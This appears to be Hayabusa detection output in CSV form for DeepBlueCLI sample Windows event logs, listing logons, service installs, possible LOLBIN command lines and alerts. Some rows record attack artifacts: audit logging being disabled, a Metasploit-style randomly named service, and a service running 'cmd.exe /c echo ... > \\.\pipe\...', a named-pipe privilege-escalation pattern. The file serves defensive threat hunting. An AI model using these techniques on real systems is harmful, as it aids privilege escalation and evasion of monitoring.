+2016-08-18 23:48:31.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:38.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b293 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b2fd | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:42.406 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Intel(R) PRO/1000 NDIS 6 Adapter Driver | Path: system32\DRIVERS\E1G60I32.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 00:28:28.043 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:28:38.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 00:29:27.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1aae1 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1af2f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:32:23.580 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: Google Update Service (gupdate) | Path: ""C:\Program Files\Google\Update\GoogleUpdate.exe"" /svc | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 00:32:23.595 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: Google Update Service (gupdatem) | Path: ""C:\Program Files\Google\Update\GoogleUpdate.exe"" /medsvc | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 01:52:36.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:52:58.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 01:58:34.966 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x190 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 01:58:34.997 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:06:20.341 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0xb44 | User: IEUser | LID: 0x970d9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:34:07.763 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\winsat.exe formal -log -cancelevent 850b2fce-84b7-4abd-a41f-f04c912c6e37 | Path: C:\Windows\System32\WinSAT.exe | PID: 0xfe4 | User: IEUser | LID: 0x970a9,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:35:08.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" -IdleTask -TaskName MpIdleTask | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x600 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:37:08.229 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:44:08.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:44:08.499 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\itulqket.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x34c | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:44:08.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ssh63wbw.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xa50 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:44:08.765 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\pcbguge2.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xee8 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:44:08.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\uacrfkow.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x7d8 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:44:09.484 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x944 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:44:09.499 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe70 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 03:07:37.968 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 03:46:20.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 03:57:20.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc80 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 03:57:21.015 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:05:34.164 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x92c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:05:34.195 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:55:29.037 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xd20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:55:30.037 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160818195530.log C:\Windows\Logs\CBS\CbsPersist_20160818195530.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:55:33.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 04:55:49.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 04:55:51.989 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x71c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:55:52.176 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:55:52.364 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:55:53.255 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xbc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:55:57.149 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xa5c | User: IEUser | LID: 0x1ceaf",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:55:57.542 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xa7c | User: IEUser | LID: 0x1ceaf,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:55:59.915 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:56:34.967 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:56:34.999 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdd0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:58:48.497 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:58:48.512 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{A4B07E49-6567-4FB8-8D39-01920E3B2357} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd14 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,info,,New Service Installed,Name: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:00:43.879 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfc0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:00:43.910 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
